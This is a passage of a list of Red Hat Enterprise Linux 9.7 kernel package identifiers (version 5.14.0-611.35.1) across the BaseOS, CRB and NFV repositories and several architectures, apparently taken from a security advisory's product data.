"BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
